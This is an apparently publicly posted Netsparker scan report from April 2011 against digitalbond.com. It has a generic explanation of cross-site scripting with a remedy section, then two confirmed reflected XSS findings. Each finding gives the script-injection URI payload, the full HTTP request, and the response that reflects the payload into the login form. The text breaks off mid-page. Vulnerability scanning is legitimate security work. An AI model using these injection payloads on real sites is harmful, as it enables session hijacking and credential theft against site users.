Netsparker, Web Application Security Scanner

XSS, DORK, digitalbond.com REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL: https://www.digitalbond.com/wp-login.php?acti...
SCAN DATE: 4/19/2011 2:56:36 PM
REPORT DATE: 4/19/2011 3:21:02 PM
SCAN DURATION: 00:14:34

Total Requests / Average Speed (req/sec.): values not recorded in this extract
20 identified
14 confirmed
0 critical
5 informational

GHDB, DORK Tests
PROFILE: Previous Settings
ENABLED ENGINES: Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

VULNERABILITIES

Severity distribution:
IMPORTANT: 50 %
MEDIUM: 5 %
LOW: 20 %
INFORMATION: 25 %
Cross-site Scripting

8 TOTAL, severity IMPORTANT, 8 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting its HTML on the fly to steal the user's credentials. It happens because input entered by a user is interpreted by the browser as HTML, JavaScript or VBScript.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the browser.

Before sanitizing user input, define a list of expected and acceptable characters and use it to populate a white-list. This list needs to be defined only once and should then be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many different environments; good examples include OWASP Reform and the Microsoft Anti-Cross-Site Scripting library.

- /wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040A)%3C/script%3E (CONFIRMED)

https://www.digitalbond.com/wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter | Type | Value
ver | GET | 20101110
URI-BASED | Raw URI | '"--></style></script><script>alert(0x00040A)</script>

Request

GET /wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00040A)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:32 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js L10n Js'&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x00040A)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=3" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/svx1C8_728x90.jpg" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom 
menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=63a7e0feef"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=be3a96e837" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of &quot;Executive Level Apathy&quot; for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that d..
- /wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E (CONFIRMED)

https://www.digitalbond.com/wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000439)</script>

Request

GET /wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000439)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:34 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js '&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000439)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond&#039;s SCADA Security Portal &raquo; Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond&#039;s SCADA Security Portal' 
href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>

<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>

<!-- Header -->
<td id="header" colspan="2">

<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond&#039;s SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond&#039;s SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item 
menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">

<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>:&nbsp;&nbsp;<a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a>&nbsp;&nbsp;<a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=ed509d58cb"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>

<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=dd6ab2da1b" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login &raquo;" />

<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>


</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS 
